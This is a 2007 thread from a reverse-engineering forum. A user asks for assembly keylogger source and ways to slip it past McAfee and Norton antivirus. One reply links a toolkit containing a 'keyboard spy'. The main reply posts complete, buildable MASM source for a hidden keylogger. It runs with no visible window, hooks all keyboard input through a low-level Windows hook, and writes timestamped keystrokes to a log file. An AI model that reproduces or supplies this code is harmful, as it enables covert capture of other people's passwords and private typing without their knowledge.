Contribute  :  Web Resources  :  Past Polls  :  Site Statistics  :  Downloads  :  Forum  
    BiW ReversingThe challenge is yours    
 Welcome to BiW Reversing
 Monday, October 15 2018 @ 12:36 PM CEST
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

ASM keylogger

 
Post new topic   Reply to topic    www.reversing.be Forum Index -> Coding Corner
View previous topic :: View next topic  
Author Message
Khaosgott96
Frequent poster
Frequent poster


Joined: 15 Aug 2005
Posts: 74

PostPosted: Tue Jan 02, 2007 6:18 pm    Post subject: ASM keylogger Reply with quote

anyone know of some basic ASM source that can capture keystrokes and log them to a ".TXT" file?

and does anyone know how mcafee/norton would respond to a home written proggie like that?

and if it is possible to write it in a way to bypass mcafee/norton.


any help would be greatly appreciated
Back to top
View user's profile Send private message
jstorme
New to the board
New to the board


Joined: 24 Mar 2006
Posts: 13

PostPosted: Wed Jan 03, 2007 11:23 am    Post subject: Reply with quote

Have a look at this toolkit
hxxp://www.wasm.ru/baixado.php?mode=tool&id=221

It has an example of a basic keyboard spy.
I don't know how it will react with an anti-virus tough.
Good luck,
Back to top
View user's profile Send private message
sharpe
Frequent poster
Frequent poster


Joined: 20 Mar 2005
Posts: 65

PostPosted: Tue Jan 09, 2007 3:12 pm    Post subject: Keylogger code Reply with quote

Make a new WinASM project and copy this into the asm file. It should build w/o any problems. Can't remember where I found it.

This keylogger is a bit shite in the way it logs but it's perhaps a good place to start. It uses a hook procedure to monitor the keyboard for events.

<asm>
.386
.model flat, stdcall

include windows.inc
include kernel32.inc
include user32.inc
includelib user32.lib
includelib kernel32.lib

WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
ourLLKeybProc PROTO :DWORD,:DWORD,:DWORD

.data
hFile HANDLE 0
bufferOffset DWORD 0
bCapsLockOn BOOL 0
bShift BOOL 0
bCaps BOOL 0
szClassName db "kLogger",0
szLogFile db "key.log",0
szLoggerStarted db "Logger started ",0
szLoggerStopped db 13,10,"Logger stopped ",0
szFormatTime db "%02d.%02d.%d %02d:%02d:%02d (UTC)",13,10,0
szError db "Invalid File name",0

KBDLLHOOKSTRUCT STRUCT
vkCode DWORD ?
scanCode DWORD ?
dwFlags DWORD ?
time DWORD ?
dwExtraInfo DWORD ?
KBDLLHOOKSTRUCT ENDS

.data?
buffer db 32 dup(?)
hInstance HINSTANCE ?
pszCommandLine LPSTR ?
nBytesWritten DWORD ?
hwnd HWND ?

.code
start:
invoke GetModuleHandle, NULL
mov hInstance, eax
invoke GetCommandLine
mov pszCommandLine, eax
invoke WinMain, hInstance, NULL, pszCommandLine, SW_HIDE
invoke ExitProcess, eax

WinMain proc hInst:HINSTANCE, hPrevInst:HINSTANCE, CmdLine:LPSTR, CmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL theHook:HHOOK
LOCAL msg:MSG

; Create/open output file
invoke CreateFile, addr szLogFile, GENERIC_WRITE, FILE_SHARE_READ,NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
mov hFile,eax
cmp eax, INVALID_HANDLE_VALUE
jne filenameok
invoke ExitProcess,0
filenameok:
invoke GetLastError
cmp eax, ERROR_ALREADY_EXISTS
jne writefile
invoke SetFilePointer, hFile, 0, NULL, FILE_END
writefile:
invoke WriteFile, hFile, addr szLoggerStarted, 15, addr nBytesWritten, NULL
call writeTimeToLog

mov wc.cbSize,sizeof WNDCLASSEX
mov wc.style,CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc,offset WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,WS_EX_CONTROLPARENT
push hInst
pop wc.hInstance
mov wc.hbrBackground,COLOR_BTNFACE+1
mov wc.lpszMenuName,NULL
mov wc.lpszClassName,offset szClassName
mov wc.hIcon,NULL
mov wc.hIconSm,NULL
mov wc.hCursor,NULL
invoke RegisterClassEx, addr wc
test eax, eax
jnz createwindow
invoke ExitProcess,0
createwindow:
; Create the window, initially hidden
invoke CreateWindowEx, NULL, addr szClassName, NULL, 0, 0, 0, 0,0, NULL, NULL, hInst, NULL
.IF(!eax)
invoke MessageBox, NULL, addr szError, addr szError, MB_OK
ret
.ENDIF
mov hwnd,eax

; Init state
invoke GetKeyState, VK_CAPITAL
.IF(eax)
mov bCaps,1
.ENDIF

; Hook it up
invoke SetWindowsHookEx, WH_KEYBOARD_LL, addr ourLLKeybProc, hInst, NULL
mov theHook,eax

; Message pump
.WHILE TRUE
invoke GetMessage, addr msg, NULL, 0, 0
.BREAK .IF(!eax)
invoke TranslateMessage, addr msg
invoke DispatchMessage, addr msg
.ENDW

; Clean up
invoke UnhookWindowsHookEx, theHook
call flushBuffer
invoke WriteFile, hFile, addr szLoggerStopped, 17, addr nBytesWritten, NULL
call writeTimeToLog
invoke CloseHandle, hFile

; Return with exitcode in eax
mov eax,msg.wParam
ret
WinMain endp

WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF(uMsg == WM_CLOSE)
invoke PostQuitMessage, NULL
xor eax,eax
ret
.ELSE
invoke DefWindowProc, hWnd, uMsg, wParam, lParam
ret
.ENDIF
WndProc endp

ourLLKeybProc proc nCode:DWORD, wParam:WPARAM, lParam:LPARAM
.IF(nCode == HC_ACTION)
mov ebx,lParam
assume ebx:ptr KBDLLHOOKSTRUCT
mov edx,[ebx].vkCode
.IF(wParam == WM_KEYDOWN)
; If user hits F12, we shut down
.IF(edx == VK_F12)
invoke PostMessage, hwnd, WM_CLOSE, NULL, NULL
ret
.ENDIF

; Keep track of shift and CapsLock
.IF(edx == VK_LSHIFT || edx == VK_RSHIFT)
mov bShift,1
.ELSEIF(edx == VK_CAPITAL)
.IF(!bCapsLockOn)
; Toggle bCaps true/false
xor bCaps,1
mov bCapsLockOn,1
.ENDIF
.ELSE
; Write to file if buffer might overflow
.IF(bufferOffset >= 32-16)
call flushBuffer
.ENDIF
mov ecx,bufferOffset
.IF(edx == VK_SPACE || edx==VK_RETURN || edx==VK_TAB)
mov buffer[ecx],dl
inc ecx
.ELSEIF(!bShift && (edx > 2Fh && edx < 3Ah))
; 0..9
mov buffer[ecx],dl
inc ecx
.ELSEIF(edx > 40h && edx < 5Bh)
; A..Z or a..z depending on shift/capslock
mov eax,bShift
xor eax,bCaps
.IF(!eax)
or edx,20h
.ENDIF
mov buffer[ecx],dl
inc ecx
.ELSE
; Everything else (named) in square-brackets
mov buffer[ecx],'['
inc ecx
.IF(bShift)
mov buffer[ecx],'!'
inc ecx
.ENDIF
push ecx
mov eax,32-1 ; leave room for ']'
sub eax,ecx
push eax ; PARAM: size of buffer
lea eax,buffer[ecx]
push eax ; PARAM: addr of buffer
mov edx,[ebx].scanCode
mov eax,[ebx].dwFlags
shl edx,16
shl eax,24
or edx,eax
push edx ; PARAM: key code
call GetKeyNameText
pop ecx
add ecx,eax
mov buffer[ecx],']'
inc ecx
.ENDIF
mov bufferOffset,ecx
.ENDIF
.ELSEIF(wParam == WM_KEYUP)
; Keep track of shift and CapsLock
.IF(edx == VK_LSHIFT || edx == VK_RSHIFT)
mov bShift,0
.ELSE
mov bCapsLockOn,0
.ENDIF
.ENDIF
assume ebx:nothing
.ENDIF

; Call next hooked proc
invoke CallNextHookEx, NULL, nCode, wParam, lParam
ret
ourLLKeybProc endp

writeTimeToLog proc
LOCAL SysTime:SYSTEMTIME
LOCAL output[32]:BYTE
invoke GetSystemTime, addr SysTime
lea ebx,SysTime
assume ebx:ptr SYSTEMTIME
xor eax,eax
mov ax,[ebx].wSecond
push eax
mov ax,[ebx].wMinute
push eax
mov ax,[ebx].wHour
push eax
mov ax,[ebx].wYear
push eax
mov ax,[ebx].wMonth
push eax
mov ax,[ebx].wDay
push eax
assume ebx:nothing
push offset szFormatTime
lea eax,output
push eax
call wsprintf
invoke WriteFile, hFile, addr output, eax, addr nBytesWritten, NULL
ret
writeTimeToLog endp

flushBuffer proc
.IF(bufferOffset != 0)
invoke WriteFile, hFile, addr buffer, bufferOffset, addr nBytesWritten, NULL
mov bufferOffset, 0
.ENDIF
ret
flushBuffer endp

exit:
invoke ExitProcess,0

end start
</asm>
Back to top
View user's profile Send private message Visit poster's website
Display posts from previous:   
Post new topic   Reply to topic    www.reversing.be Forum Index -> Coding Corner All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group
 Copyright © 2018 BiW Reversing
 All trademarks and copyrights on this page are owned by their respective owners.
Powered By Geeklog 
Created this page in 0.07 seconds